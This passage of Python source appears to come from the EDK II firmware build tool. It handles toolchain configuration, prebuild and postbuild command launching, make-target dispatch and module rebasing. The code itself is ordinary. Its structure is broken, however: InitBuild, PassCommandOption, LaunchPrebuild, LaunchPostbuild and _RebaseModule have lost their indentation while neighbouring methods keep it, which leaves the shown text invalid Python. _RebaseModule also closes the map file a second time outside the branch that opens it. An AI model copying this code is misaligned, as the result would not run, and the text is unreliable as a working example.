            return False, e.args[0]
        except:
            # NOTE(review): bare except also swallows KeyboardInterrupt/SystemExit
            # and reports them as UNKNOWN_ERROR — confirm this is intended.
            return False, UNKNOWN_ERROR
## Add TOOLCHAIN and FAMILY declared in DSC [BuildOptions] to ToolsDefTxtDatabase.
#
# Loop through the set of build targets, tool chains, and archs provided on either
# the command line or in target.txt to discover FAMILY and TOOLCHAIN delclarations
# in [BuildOptions] sections that may be within !if expressions that may use
# $(TARGET), $(TOOLCHAIN), $(TOOLCHAIN_TAG), or $(ARCH) operands.
#
    def GetToolChainAndFamilyFromDsc (self, File):
        """Discover FAMILY/TOOLCHAIN declarations in DSC [BuildOptions] and
        register them in ToolsDefTxtDatabase.

        Iterates every (target, toolchain, arch) combination so that
        declarations guarded by !if expressions using $(TARGET), $(TOOLCHAIN),
        $(TOOL_CHAIN_TAG) or $(ARCH) are all evaluated.  gGlobalDefines is
        temporarily overwritten per combination and restored on exit.

        @param File  The platform DSC file to scan.
        """
        SavedGlobalDefines = GlobalData.gGlobalDefines.copy()
        for BuildTarget in self.BuildTargetList:
            GlobalData.gGlobalDefines['TARGET'] = BuildTarget
            for BuildToolChain in self.ToolChainList:
                GlobalData.gGlobalDefines['TOOLCHAIN'] = BuildToolChain
                GlobalData.gGlobalDefines['TOOL_CHAIN_TAG'] = BuildToolChain
                for BuildArch in self.ArchList:
                    GlobalData.gGlobalDefines['ARCH'] = BuildArch
                    dscobj = self.BuildDatabase[File, BuildArch]
                    for KeyFamily, Key, KeyCodeBase in dscobj.BuildOptions:
                        # Keys not shaped TARGET_TOOLCHAIN_ARCH_TOOL_ATTR are
                        # not FAMILY declarations; skip them.
                        try:
                            Target, ToolChain, Arch, Tool, Attr = Key.split('_')
                        except:
                            continue
                        if ToolChain == TAB_STAR or Attr != TAB_TOD_DEFINES_FAMILY:
                            continue
                        try:
                            Family = dscobj.BuildOptions[(KeyFamily, Key, KeyCodeBase)]
                            Family = Family.strip().strip('=').strip()
                        except:
                            continue
                        # Register family and tool-chain tag; first declaration
                        # for a given tool chain wins.
                        if TAB_TOD_DEFINES_FAMILY not in self.ToolDef.ToolsDefTxtDatabase:
                            self.ToolDef.ToolsDefTxtDatabase[TAB_TOD_DEFINES_FAMILY] = {}
                        if ToolChain not in self.ToolDef.ToolsDefTxtDatabase[TAB_TOD_DEFINES_FAMILY]:
                            self.ToolDef.ToolsDefTxtDatabase[TAB_TOD_DEFINES_FAMILY][ToolChain] = Family
                        if TAB_TOD_DEFINES_BUILDRULEFAMILY not in self.ToolDef.ToolsDefTxtDatabase:
                            self.ToolDef.ToolsDefTxtDatabase[TAB_TOD_DEFINES_BUILDRULEFAMILY] = {}
                        if ToolChain not in self.ToolDef.ToolsDefTxtDatabase[TAB_TOD_DEFINES_BUILDRULEFAMILY]:
                            self.ToolDef.ToolsDefTxtDatabase[TAB_TOD_DEFINES_BUILDRULEFAMILY][ToolChain] = Family
                        if TAB_TOD_DEFINES_TOOL_CHAIN_TAG not in self.ToolDef.ToolsDefTxtDatabase:
                            self.ToolDef.ToolsDefTxtDatabase[TAB_TOD_DEFINES_TOOL_CHAIN_TAG] = []
                        if ToolChain not in self.ToolDef.ToolsDefTxtDatabase[TAB_TOD_DEFINES_TOOL_CHAIN_TAG]:
                            self.ToolDef.ToolsDefTxtDatabase[TAB_TOD_DEFINES_TOOL_CHAIN_TAG].append(ToolChain)
        GlobalData.gGlobalDefines = SavedGlobalDefines
## Load configuration
#
# This method will parse target.txt and get the build configurations.
#
    def LoadConfiguration(self):
        """Merge build configuration from the command line and target.txt.

        Fills in self.ArchList, BuildTargetList, ToolChainList, PlatformFile,
        ToolChainFamily and ThreadNumber, preferring command-line values and
        falling back to target.txt.  Aborts via EdkLogger.error when no
        usable tool chain or platform can be determined.
        """
        # if no ARCH given in command line, get it from target.txt
        if not self.ArchList:
            self.ArchList = self.TargetTxt.TargetTxtDictionary[TAB_TAT_DEFINES_TARGET_ARCH]
        self.ArchList = tuple(self.ArchList)
        # if no build target given in command line, get it from target.txt
        if not self.BuildTargetList:
            self.BuildTargetList = self.TargetTxt.TargetTxtDictionary[TAB_TAT_DEFINES_TARGET]
        # if no tool chain given in command line, get it from target.txt
        if not self.ToolChainList:
            self.ToolChainList = self.TargetTxt.TargetTxtDictionary[TAB_TAT_DEFINES_TOOL_CHAIN_TAG]
            if self.ToolChainList is None or len(self.ToolChainList) == 0:
                EdkLogger.error("build", RESOURCE_NOT_AVAILABLE, ExtraData="No toolchain given. Don't know how to build.\n")
        if not self.PlatformFile:
            PlatformFile = self.TargetTxt.TargetTxtDictionary[TAB_TAT_DEFINES_ACTIVE_PLATFORM]
            if not PlatformFile:
                # Try to find one in current directory
                WorkingDirectory = os.getcwd()
                FileList = glob.glob(os.path.normpath(os.path.join(WorkingDirectory, '*.dsc')))
                FileNum = len(FileList)
                if FileNum >= 2:
                    # Ambiguous: refuse to guess between multiple DSC files.
                    EdkLogger.error("build", OPTION_MISSING,
                                    ExtraData="There are %d DSC files in %s. Use '-p' to specify one.\n" % (FileNum, WorkingDirectory))
                elif FileNum == 1:
                    PlatformFile = FileList[0]
                else:
                    EdkLogger.error("build", RESOURCE_NOT_AVAILABLE,
                                    ExtraData="No active platform specified in target.txt or command line! Nothing can be built.\n")
            self.PlatformFile = PathClass(NormFile(PlatformFile, self.WorkspaceDir), self.WorkspaceDir)
        # Pick up FAMILY declarations made inside the DSC [BuildOptions].
        self.GetToolChainAndFamilyFromDsc (self.PlatformFile)
        # check if the tool chains are defined or not
        NewToolChainList = []
        for ToolChain in self.ToolChainList:
            if ToolChain not in self.ToolDef.ToolsDefTxtDatabase[TAB_TOD_DEFINES_TOOL_CHAIN_TAG]:
                EdkLogger.warn("build", "Tool chain [%s] is not defined" % ToolChain)
            else:
                NewToolChainList.append(ToolChain)
        # if no tool chain available, break the build
        if len(NewToolChainList) == 0:
            EdkLogger.error("build", RESOURCE_NOT_AVAILABLE,
                            ExtraData="[%s] not defined. No toolchain available for build!\n" % ", ".join(self.ToolChainList))
        else:
            self.ToolChainList = NewToolChainList
        # Resolve the compiler family for each remaining tool chain.
        ToolChainFamily = []
        ToolDefinition = self.ToolDef.ToolsDefTxtDatabase
        for Tool in self.ToolChainList:
            if TAB_TOD_DEFINES_FAMILY not in ToolDefinition or Tool not in ToolDefinition[TAB_TOD_DEFINES_FAMILY] \
               or not ToolDefinition[TAB_TOD_DEFINES_FAMILY][Tool]:
                EdkLogger.warn("build", "No tool chain family found in configuration for %s. Default to MSFT." % Tool)
                ToolChainFamily.append(TAB_COMPILER_MSFT)
            else:
                ToolChainFamily.append(ToolDefinition[TAB_TOD_DEFINES_FAMILY][Tool])
        self.ToolChainFamily = ToolChainFamily
        self.ThreadNumber = ThreadNum()
## Initialize build configuration
#
# This method will parse DSC file and merge the configurations from
# command line and target.txt, then get the final build configurations.
#
def InitBuild(self):
# parse target.txt, tools_def.txt, and platform file
self.LoadConfiguration()
# Allow case-insensitive for those from command line or configuration file
ErrorCode, ErrorInfo = self.PlatformFile.Validate(".dsc", False)
if ErrorCode != 0:
EdkLogger.error("build", ErrorCode, ExtraData=ErrorInfo)
    def InitPreBuild(self):
        """Determine the PREBUILD command and normalize its arguments.

        The command comes from the PREBUILD command-line define when present,
        otherwise from the platform DSC.  Workspace-relative file arguments
        are converted to absolute paths, then the forwarded build options are
        appended via PassCommandOption.
        """
        self.LoadConfiguration()
        ErrorCode, ErrorInfo = self.PlatformFile.Validate(".dsc", False)
        if ErrorCode != 0:
            EdkLogger.error("build", ErrorCode, ExtraData=ErrorInfo)
        # Seed gGlobalDefines with the first of each list so the DSC can be
        # evaluated while resolving the prebuild command.
        if self.BuildTargetList:
            GlobalData.gGlobalDefines['TARGET'] = self.BuildTargetList[0]
        if self.ArchList:
            GlobalData.gGlobalDefines['ARCH'] = self.ArchList[0]
        if self.ToolChainList:
            GlobalData.gGlobalDefines['TOOLCHAIN'] = self.ToolChainList[0]
            GlobalData.gGlobalDefines['TOOL_CHAIN_TAG'] = self.ToolChainList[0]
        if self.ToolChainFamily:
            GlobalData.gGlobalDefines['FAMILY'] = self.ToolChainFamily[0]
        if 'PREBUILD' in GlobalData.gCommandLineDefines:
            self.Prebuild = GlobalData.gCommandLineDefines.get('PREBUILD')
        else:
            self.Db_Flag = True
            Platform = self.Db.MapPlatform(str(self.PlatformFile))
            self.Prebuild = str(Platform.Prebuild)
        if self.Prebuild:
            PrebuildList = []
            #
            # Evaluate all arguments and convert arguments that are WORKSPACE
            # relative paths to absolute paths. Filter arguments that look like
            # flags or do not follow the file/dir naming rules to avoid false
            # positives on this conversion.
            #
            for Arg in self.Prebuild.split():
                #
                # Do not modify Arg if it looks like a flag or an absolute file path
                #
                if Arg.startswith('-') or os.path.isabs(Arg):
                    PrebuildList.append(Arg)
                    continue
                #
                # Do not modify Arg if it does not look like a Workspace relative
                # path that starts with a valid package directory name
                #
                if not Arg[0].isalpha() or os.path.dirname(Arg) == '':
                    PrebuildList.append(Arg)
                    continue
                #
                # If Arg looks like a WORKSPACE relative path, then convert to an
                # absolute path and check to see if the file exists.
                #
                Temp = mws.join(self.WorkspaceDir, Arg)
                if os.path.isfile(Temp):
                    Arg = Temp
                PrebuildList.append(Arg)
            self.Prebuild = ' '.join(PrebuildList)
            self.Prebuild += self.PassCommandOption(self.BuildTargetList, self.ArchList, self.ToolChainList, self.PlatformFile, self.Target)
    def InitPostBuild(self):
        """Determine the POSTBUILD command and normalize its arguments.

        Mirrors InitPreBuild: the command comes from the POSTBUILD
        command-line define when present, otherwise from the platform DSC;
        workspace-relative file arguments are converted to absolute paths and
        the forwarded build options are appended via PassCommandOption.
        """
        if 'POSTBUILD' in GlobalData.gCommandLineDefines:
            self.Postbuild = GlobalData.gCommandLineDefines.get('POSTBUILD')
        else:
            Platform = self.Db.MapPlatform(str(self.PlatformFile))
            self.Postbuild = str(Platform.Postbuild)
        if self.Postbuild:
            PostbuildList = []
            #
            # Evaluate all arguments and convert arguments that are WORKSPACE
            # relative paths to absolute paths. Filter arguments that look like
            # flags or do not follow the file/dir naming rules to avoid false
            # positives on this conversion.
            #
            for Arg in self.Postbuild.split():
                #
                # Do not modify Arg if it looks like a flag or an absolute file path
                #
                if Arg.startswith('-') or os.path.isabs(Arg):
                    PostbuildList.append(Arg)
                    continue
                #
                # Do not modify Arg if it does not look like a Workspace relative
                # path that starts with a valid package directory name
                #
                if not Arg[0].isalpha() or os.path.dirname(Arg) == '':
                    PostbuildList.append(Arg)
                    continue
                #
                # If Arg looks like a WORKSPACE relative path, then convert to an
                # absolute path and check to see if the file exists.
                #
                Temp = mws.join(self.WorkspaceDir, Arg)
                if os.path.isfile(Temp):
                    Arg = Temp
                PostbuildList.append(Arg)
            self.Postbuild = ' '.join(PostbuildList)
            self.Postbuild += self.PassCommandOption(self.BuildTargetList, self.ArchList, self.ToolChainList, self.PlatformFile, self.Target)
def PassCommandOption(self, BuildTarget, TargetArch, ToolChain, PlatformFile, Target):
BuildStr = ''
if GlobalData.gCommand and isinstance(GlobalData.gCommand, list):
BuildStr += ' ' + ' '.join(GlobalData.gCommand)
TargetFlag = False
ArchFlag = False
ToolChainFlag = False
PlatformFileFlag = False
if GlobalData.gOptions and not GlobalData.gOptions.BuildTarget:
TargetFlag = True
if GlobalData.gOptions and not GlobalData.gOptions.TargetArch:
ArchFlag = True
if GlobalData.gOptions and not GlobalData.gOptions.ToolChain:
ToolChainFlag = True
if GlobalData.gOptions and not GlobalData.gOptions.PlatformFile:
PlatformFileFlag = True
if TargetFlag and BuildTarget:
if isinstance(BuildTarget, list) or isinstance(BuildTarget, tuple):
BuildStr += ' -b ' + ' -b '.join(BuildTarget)
elif isinstance(BuildTarget, str):
BuildStr += ' -b ' + BuildTarget
if ArchFlag and TargetArch:
if isinstance(TargetArch, list) or isinstance(TargetArch, tuple):
BuildStr += ' -a ' + ' -a '.join(TargetArch)
elif isinstance(TargetArch, str):
BuildStr += ' -a ' + TargetArch
if ToolChainFlag and ToolChain:
if isinstance(ToolChain, list) or isinstance(ToolChain, tuple):
BuildStr += ' -t ' + ' -t '.join(ToolChain)
elif isinstance(ToolChain, str):
BuildStr += ' -t ' + ToolChain
if PlatformFileFlag and PlatformFile:
if isinstance(PlatformFile, list) or isinstance(PlatformFile, tuple):
BuildStr += ' -p ' + ' -p '.join(PlatformFile)
elif isinstance(PlatformFile, str):
BuildStr += ' -p' + PlatformFile
BuildStr += ' --conf=' + GlobalData.gConfDirectory
if Target:
BuildStr += ' ' + Target
return BuildStr
def LaunchPrebuild(self):
if self.Prebuild:
EdkLogger.info("\n- Prebuild Start -\n")
self.LaunchPrebuildFlag = True
#
# The purpose of .PrebuildEnv file is capture environment variable settings set by the prebuild script
# and preserve them for the rest of the main build step, because the child process environment will
# evaporate as soon as it exits, we cannot get it in build step.
#
PrebuildEnvFile = os.path.join(GlobalData.gConfDirectory, '.cache', '.PrebuildEnv')
if os.path.isfile(PrebuildEnvFile):
os.remove(PrebuildEnvFile)
if os.path.isfile(self.PlatformBuildPath):
os.remove(self.PlatformBuildPath)
if sys.platform == "win32":
args = ' && '.join((self.Prebuild, 'set > ' + PrebuildEnvFile))
Process = Popen(args, stdout=PIPE, stderr=PIPE, shell=True)
else:
args = ' && '.join((self.Prebuild, 'env > ' + PrebuildEnvFile))
Process = Popen(args, stdout=PIPE, stderr=PIPE, shell=True)
# launch two threads to read the STDOUT and STDERR
EndOfProcedure = Event()
EndOfProcedure.clear()
if Process.stdout:
StdOutThread = Thread(target=ReadMessage, args=(Process.stdout, EdkLogger.info, EndOfProcedure))
StdOutThread.name = "STDOUT-Redirector"
StdOutThread.daemon = False
StdOutThread.start()
if Process.stderr:
StdErrThread = Thread(target=ReadMessage, args=(Process.stderr, EdkLogger.quiet, EndOfProcedure))
StdErrThread.name = "STDERR-Redirector"
StdErrThread.daemon = False
StdErrThread.start()
# waiting for program exit
Process.wait()
if Process.stdout:
StdOutThread.join()
if Process.stderr:
StdErrThread.join()
if Process.returncode != 0 :
EdkLogger.error("Prebuild", PREBUILD_ERROR, 'Prebuild process is not success!')
if os.path.exists(PrebuildEnvFile):
f = open(PrebuildEnvFile)
envs = f.readlines()
f.close()
envs = [l.split("=", 1) for l in envs ]
envs = [[I.strip() for I in item] for item in envs if len(item) == 2]
os.environ.update(dict(envs))
EdkLogger.info("\n- Prebuild Done -\n")
def LaunchPostbuild(self):
if self.Postbuild:
EdkLogger.info("\n- Postbuild Start -\n")
if sys.platform == "win32":
Process = Popen(self.Postbuild, stdout=PIPE, stderr=PIPE, shell=True)
else:
Process = Popen(self.Postbuild, stdout=PIPE, stderr=PIPE, shell=True)
# launch two threads to read the STDOUT and STDERR
EndOfProcedure = Event()
EndOfProcedure.clear()
if Process.stdout:
StdOutThread = Thread(target=ReadMessage, args=(Process.stdout, EdkLogger.info, EndOfProcedure))
StdOutThread.name = "STDOUT-Redirector"
StdOutThread.daemon = False
StdOutThread.start()
if Process.stderr:
StdErrThread = Thread(target=ReadMessage, args=(Process.stderr, EdkLogger.quiet, EndOfProcedure))
StdErrThread.name = "STDERR-Redirector"
StdErrThread.daemon = False
StdErrThread.start()
# waiting for program exit
Process.wait()
if Process.stdout:
StdOutThread.join()
if Process.stderr:
StdErrThread.join()
if Process.returncode != 0 :
EdkLogger.error("Postbuild", POSTBUILD_ERROR, 'Postbuild process is not success!')
EdkLogger.info("\n- Postbuild Done -\n")
## Build a module or platform
#
# Create autogen code and makefile for a module or platform, and the launch
# "make" command to build it
#
# @param Target The target of build command
# @param Platform The platform file
# @param Module The module file
# @param BuildTarget The name of build target, one of "DEBUG", "RELEASE"
# @param ToolChain The name of toolchain to build
# @param Arch The arch of the module/platform
# @param CreateDepModuleCodeFile Flag used to indicate creating code
# for dependent modules/Libraries
# @param CreateDepModuleMakeFile Flag used to indicate creating makefile
# for dependent modules/Libraries
#
    def _BuildPa(self, Target, AutoGenObject, CreateDepsCodeFile=True, CreateDepsMakeFile=True, BuildModule=False, FfsCommand=None, PcdMaList=None):
        """Generate AutoGen code/makefiles for a PlatformAutoGen object and
        dispatch the requested make target.

        @param Target         Build target name ('all', 'modules', 'libraries',
                              'clean', 'cleanlib', 'cleanall', 'run', 'fds', ...)
        @param AutoGenObject  The PlatformAutoGen object to build.
        @param BuildModule    When True, invoke make with Target directly.
        @param FfsCommand     Optional FFS command dict shared via DataPipe.
        @param PcdMaList      PCD driver ModuleAutoGen list for in-process AutoGen.
        @return True on success; False when AutoGenObject is None.
        """
        if AutoGenObject is None:
            return False
        if FfsCommand is None:
            FfsCommand = {}
        # skip file generation for cleanxxx targets, run and fds target
        if Target not in ['clean', 'cleanlib', 'cleanall', 'run', 'fds']:
            # for target which must generate AutoGen code and makefile
            mqueue = mp.Queue()
            for m in AutoGenObject.GetAllModuleInfo:
                mqueue.put(m)
            # Sentinel entry tells workers there is no more module work.
            mqueue.put((None,None,None,None,None,None,None))
            AutoGenObject.DataPipe.DataContainer = {"CommandTarget": self.Target}
            AutoGenObject.DataPipe.DataContainer = {"Workspace_timestamp": AutoGenObject.Workspace._SrcTimeStamp}
            AutoGenObject.CreateLibModuelDirs()
            AutoGenObject.DataPipe.DataContainer = {"LibraryBuildDirectoryList":AutoGenObject.LibraryBuildDirectoryList}
            AutoGenObject.DataPipe.DataContainer = {"ModuleBuildDirectoryList":AutoGenObject.ModuleBuildDirectoryList}
            AutoGenObject.DataPipe.DataContainer = {"FdsCommandDict": AutoGenObject.Workspace.GenFdsCommandDict}
            self.Progress.Start("Generating makefile and code")
            # Persist the shared build context so worker processes can load it.
            data_pipe_file = os.path.join(AutoGenObject.BuildDir, "GlobalVar_%s_%s.bin" % (str(AutoGenObject.Guid),AutoGenObject.Arch))
            AutoGenObject.DataPipe.dump(data_pipe_file)
            cqueue = mp.Queue()
            autogen_rt,errorcode = self.StartAutoGen(mqueue, AutoGenObject.DataPipe, self.SkipAutoGen, PcdMaList, cqueue)
            # Record identifying info for this AutoGen run.
            AutoGenIdFile = os.path.join(GlobalData.gConfDirectory,".AutoGenIdFile.txt")
            with open(AutoGenIdFile,"w") as fw:
                fw.write("Arch=%s\n" % "|".join((AutoGenObject.Workspace.ArchList)))
                fw.write("BuildDir=%s\n" % AutoGenObject.Workspace.BuildDir)
                fw.write("PlatformGuid=%s\n" % str(AutoGenObject.Guid))
            self.Progress.Stop("done!")
            if not autogen_rt:
                # AutoGen failed: stop workers before propagating the error.
                self.AutoGenMgr.TerminateWorkers()
                self.AutoGenMgr.join(1)
                raise FatalError(errorcode)
            AutoGenObject.CreateCodeFile(False)
            AutoGenObject.CreateMakeFile(False)
        else:
            # always recreate top/platform makefile when clean, just in case of inconsistency
            AutoGenObject.CreateCodeFile(True)
            AutoGenObject.CreateMakeFile(True)

        if EdkLogger.GetLevel() == EdkLogger.QUIET:
            EdkLogger.quiet("Building ... %s" % repr(AutoGenObject))

        BuildCommand = AutoGenObject.BuildCommand
        if BuildCommand is None or len(BuildCommand) == 0:
            EdkLogger.error("build", OPTION_MISSING,
                            "No build command found for this module. "
                            "Please check your setting of %s_%s_%s_MAKE_PATH in Conf/tools_def.txt file." %
                                (AutoGenObject.BuildTarget, AutoGenObject.ToolChain, AutoGenObject.Arch),
                            ExtraData=str(AutoGenObject))

        # run
        if Target == 'run':
            return True

        # Fetch the MakeFileName.
        self.MakeFileName = AutoGenObject.MakeFileName

        # build modules
        if BuildModule:
            BuildCommand = BuildCommand + [Target]
            LaunchCommand(BuildCommand, AutoGenObject.MakeFileDir)
            if GlobalData.gBinCacheDest:
                self.GenDestCache()
            elif GlobalData.gUseHashCache and not GlobalData.gBinCacheSource:
                # Only for --hash
                # Update PreMakeCacheChain files
                self.GenLocalPreMakeCache()
            self.BuildModules = []
            return True

        # build library
        if Target == 'libraries':
            DirList = []
            for Lib in AutoGenObject.LibraryAutoGenList:
                if not Lib.IsBinaryModule:
                    DirList.append((os.path.join(AutoGenObject.BuildDir, Lib.BuildDir),Lib))
            for Lib, LibAutoGen in DirList:
                NewBuildCommand = BuildCommand + ['-f', os.path.normpath(os.path.join(Lib, self.MakeFileName)), 'pbuild']
                LaunchCommand(NewBuildCommand, AutoGenObject.MakeFileDir,LibAutoGen)
            return True

        # build module
        if Target == 'modules':
            # Libraries must be built before the modules that link them.
            DirList = []
            for Lib in AutoGenObject.LibraryAutoGenList:
                if not Lib.IsBinaryModule:
                    DirList.append((os.path.join(AutoGenObject.BuildDir, Lib.BuildDir),Lib))
            for Lib, LibAutoGen in DirList:
                NewBuildCommand = BuildCommand + ['-f', os.path.normpath(os.path.join(Lib, self.MakeFileName)), 'pbuild']
                LaunchCommand(NewBuildCommand, AutoGenObject.MakeFileDir,LibAutoGen)
            DirList = []
            for ModuleAutoGen in AutoGenObject.ModuleAutoGenList:
                if not ModuleAutoGen.IsBinaryModule:
                    DirList.append((os.path.join(AutoGenObject.BuildDir, ModuleAutoGen.BuildDir),ModuleAutoGen))
            for Mod,ModAutoGen in DirList:
                NewBuildCommand = BuildCommand + ['-f', os.path.normpath(os.path.join(Mod, self.MakeFileName)), 'pbuild']
                LaunchCommand(NewBuildCommand, AutoGenObject.MakeFileDir,ModAutoGen)
            self.CreateAsBuiltInf()
            if GlobalData.gBinCacheDest:
                self.GenDestCache()
            elif GlobalData.gUseHashCache and not GlobalData.gBinCacheSource:
                # Only for --hash
                # Update PreMakeCacheChain files
                self.GenLocalPreMakeCache()
            self.BuildModules = []
            return True

        # cleanlib
        if Target == 'cleanlib':
            for Lib in AutoGenObject.LibraryBuildDirectoryList:
                LibMakefile = os.path.normpath(os.path.join(Lib, self.MakeFileName))
                if os.path.exists(LibMakefile):
                    NewBuildCommand = BuildCommand + ['-f', LibMakefile, 'cleanall']
                    LaunchCommand(NewBuildCommand, AutoGenObject.MakeFileDir)
            return True

        # clean
        if Target == 'clean':
            for Mod in AutoGenObject.ModuleBuildDirectoryList:
                ModMakefile = os.path.normpath(os.path.join(Mod, self.MakeFileName))
                if os.path.exists(ModMakefile):
                    NewBuildCommand = BuildCommand + ['-f', ModMakefile, 'cleanall']
                    LaunchCommand(NewBuildCommand, AutoGenObject.MakeFileDir)
            for Lib in AutoGenObject.LibraryBuildDirectoryList:
                LibMakefile = os.path.normpath(os.path.join(Lib, self.MakeFileName))
                if os.path.exists(LibMakefile):
                    NewBuildCommand = BuildCommand + ['-f', LibMakefile, 'cleanall']
                    LaunchCommand(NewBuildCommand, AutoGenObject.MakeFileDir)
            return True

        # cleanall
        if Target == 'cleanall':
            try:
                #os.rmdir(AutoGenObject.BuildDir)
                RemoveDirectory(AutoGenObject.BuildDir, True)
            except WindowsError as X:
                EdkLogger.error("build", FILE_DELETE_FAILURE, ExtraData=str(X))
        return True
## Build a module or platform
#
# Create autogen code and makefile for a module or platform, and the launch
# "make" command to build it
#
# @param Target The target of build command
# @param Platform The platform file
# @param Module The module file
# @param BuildTarget The name of build target, one of "DEBUG", "RELEASE"
# @param ToolChain The name of toolchain to build
# @param Arch The arch of the module/platform
# @param CreateDepModuleCodeFile Flag used to indicate creating code
# for dependent modules/Libraries
# @param CreateDepModuleMakeFile Flag used to indicate creating makefile
# for dependent modules/Libraries
#
    def _Build(self, Target, AutoGenObject, CreateDepsCodeFile=True, CreateDepsMakeFile=True, BuildModule=False):
        """Create AutoGen code and makefile for a module/platform AutoGen
        object, then launch make for the requested target.

        @param Target         Build target ('all', 'genc', 'genmake', 'fds',
                              'run', 'clean', 'cleanall', ...)
        @param AutoGenObject  The AutoGen object to build.
        @param BuildModule    When True, invoke the make command directly.
        @return True on success; False when AutoGenObject is None.
        """
        if AutoGenObject is None:
            return False
        # skip file generation for cleanxxx targets, run and fds target
        if Target not in ['clean', 'cleanlib', 'cleanall', 'run', 'fds']:
            # for target which must generate AutoGen code and makefile
            if not self.SkipAutoGen or Target == 'genc':
                self.Progress.Start("Generating code")
                AutoGenObject.CreateCodeFile(CreateDepsCodeFile)
                self.Progress.Stop("done!")
            # 'genc' stops after code generation.
            if Target == "genc":
                return True

            if not self.SkipAutoGen or Target == 'genmake':
                self.Progress.Start("Generating makefile")
                AutoGenObject.CreateMakeFile(CreateDepsMakeFile)
                #AutoGenObject.CreateAsBuiltInf()
                self.Progress.Stop("done!")
            # 'genmake' stops after makefile generation.
            if Target == "genmake":
                return True
        else:
            # always recreate top/platform makefile when clean, just in case of inconsistency
            AutoGenObject.CreateCodeFile(True)
            AutoGenObject.CreateMakeFile(True)

        if EdkLogger.GetLevel() == EdkLogger.QUIET:
            EdkLogger.quiet("Building ... %s" % repr(AutoGenObject))

        BuildCommand = AutoGenObject.BuildCommand
        if BuildCommand is None or len(BuildCommand) == 0:
            EdkLogger.error("build", OPTION_MISSING,
                            "No build command found for this module. "
                            "Please check your setting of %s_%s_%s_MAKE_PATH in Conf/tools_def.txt file." %
                                (AutoGenObject.BuildTarget, AutoGenObject.ToolChain, AutoGenObject.Arch),
                            ExtraData=str(AutoGenObject))

        # build modules
        if BuildModule:
            if Target != 'fds':
                BuildCommand = BuildCommand + [Target]
            AutoGenObject.BuildTime = LaunchCommand(BuildCommand, AutoGenObject.MakeFileDir)
            self.CreateAsBuiltInf()
            if GlobalData.gBinCacheDest:
                self.GenDestCache()
            elif GlobalData.gUseHashCache and not GlobalData.gBinCacheSource:
                # Only for --hash
                # Update PreMakeCacheChain files
                self.GenLocalPreMakeCache()
            self.BuildModules = []
            return True

        # genfds
        if Target == 'fds':
            if GenFdsApi(AutoGenObject.GenFdsCommandDict, self.Db):
                EdkLogger.error("build", COMMAND_FAILURE)
            # Optionally enforce a minimum free-space threshold on the FV dir.
            Threshold = self.GetFreeSizeThreshold()
            if Threshold:
                self.CheckFreeSizeThreshold(Threshold, AutoGenObject.FvDir)
            return True

        # run
        if Target == 'run':
            return True

        # build library
        if Target == 'libraries':
            pass

        # not build modules

        # cleanall
        if Target == 'cleanall':
            try:
                #os.rmdir(AutoGenObject.BuildDir)
                RemoveDirectory(AutoGenObject.BuildDir, True)
            except WindowsError as X:
                EdkLogger.error("build", FILE_DELETE_FAILURE, ExtraData=str(X))
        return True
## Rebase module image and Get function address for the input module list.
#
def _RebaseModule (self, MapBuffer, BaseAddress, ModuleList, AddrIsOffset = True, ModeIsSmm = False):
if ModeIsSmm:
AddrIsOffset = False
for InfFile in ModuleList:
sys.stdout.write (".")
sys.stdout.flush()
ModuleInfo = ModuleList[InfFile]
ModuleName = ModuleInfo.BaseName
ModuleOutputImage = ModuleInfo.Image.FileName
ModuleDebugImage = os.path.join(ModuleInfo.DebugDir, ModuleInfo.BaseName + '.efi')
## for SMM module in SMRAM, the SMRAM will be allocated from base to top.
if not ModeIsSmm:
BaseAddress = BaseAddress - ModuleInfo.Image.Size
#
# Update Image to new BaseAddress by GenFw tool
#
LaunchCommand(["GenFw", "--rebase", str(BaseAddress), "-r", ModuleOutputImage], ModuleInfo.OutputDir)
LaunchCommand(["GenFw", "--rebase", str(BaseAddress), "-r", ModuleDebugImage], ModuleInfo.DebugDir)
else:
#
# Set new address to the section header only for SMM driver.
#
LaunchCommand(["GenFw", "--address", str(BaseAddress), "-r", ModuleOutputImage], ModuleInfo.OutputDir)
LaunchCommand(["GenFw", "--address", str(BaseAddress), "-r", ModuleDebugImage], ModuleInfo.DebugDir)
#
# Collect function address from Map file
#
ImageMapTable = ModuleOutputImage.replace('.efi', '.map')
FunctionList = []
if os.path.exists(ImageMapTable):
OrigImageBaseAddress = 0
ImageMap = open(ImageMapTable, 'r')
for LinStr in ImageMap:
if len (LinStr.strip()) == 0:
continue
#
# Get the preferred address set on link time.
#
if LinStr.find ('Preferred load address is') != -1:
StrList = LinStr.split()
OrigImageBaseAddress = int (StrList[len(StrList) - 1], 16)
StrList = LinStr.split()
if len (StrList) > 4:
if StrList[3] == 'f' or StrList[3] == 'F':
Name = StrList[1]
RelativeAddress = int (StrList[2], 16) - OrigImageBaseAddress
FunctionList.append ((Name, RelativeAddress))
ImageMap.close()
#
# Add general information.
#
if ModeIsSmm:
MapBuffer.append('\n\n%s (Fixed SMRAM Offset, BaseAddress=0x%010X, EntryPoint=0x%010X)\n' % (ModuleName, BaseAddress, BaseAddress + ModuleInfo.Image.EntryPoint))
elif AddrIsOffset:
MapBuffer.append('\n\n%s (Fixed Memory Offset, BaseAddress=-0x%010X, EntryPoint=-0x%010X)\n' % (ModuleName, 0 - BaseAddress, 0 - (BaseAddress + ModuleInfo.Image.EntryPoint)))
else:
MapBuffer.append('\n\n%s (Fixed Memory Address, BaseAddress=0x%010X, EntryPoint=0x%010X)\n' % (ModuleName, BaseAddress, BaseAddress + ModuleInfo.Image.EntryPoint))
#
# Add guid and general seciton section.
#
TextSectionAddress = 0
DataSectionAddress = 0
for SectionHeader in ModuleInfo.Image.SectionHeaderList:
if SectionHeader[0] == '.text':
TextSectionAddress = SectionHeader[1]
elif SectionHeader[0] in ['.data', '.sdata']:
DataSectionAddress = SectionHeader[1]
if AddrIsOffset:
MapBuffer.append('(GUID=%s, .textbaseaddress=-0x%010X, .databaseaddress=-0x%010X)\n' % (ModuleInfo.Guid, 0 - (BaseAddress + TextSectionAddress), 0 - (BaseAddress + DataSectionAddress)))
else:
MapBuffer.append('(GUID=%s, .textbaseaddress=0x%010X, .databaseaddress=0x%010X)\n' % (ModuleInfo.Guid, BaseAddress + TextSectionAddress, BaseAddress + DataSectionAddress))
#
# Add debug image full path.
#
MapBuffer.append('(IMAGE=%s)\n\n' % (ModuleDebugImage))
#
# Add function address
#
for Function in FunctionList:
if AddrIsOffset:
MapBuffer.append(' -0x%010X %s\n' % (0 - (BaseAddress + Function[1]), Function[0]))
else:
MapBuffer.append(' 0x%010X %s\n' % (BaseAddress + Function[1], Function[0]))
ImageMap.close()
#
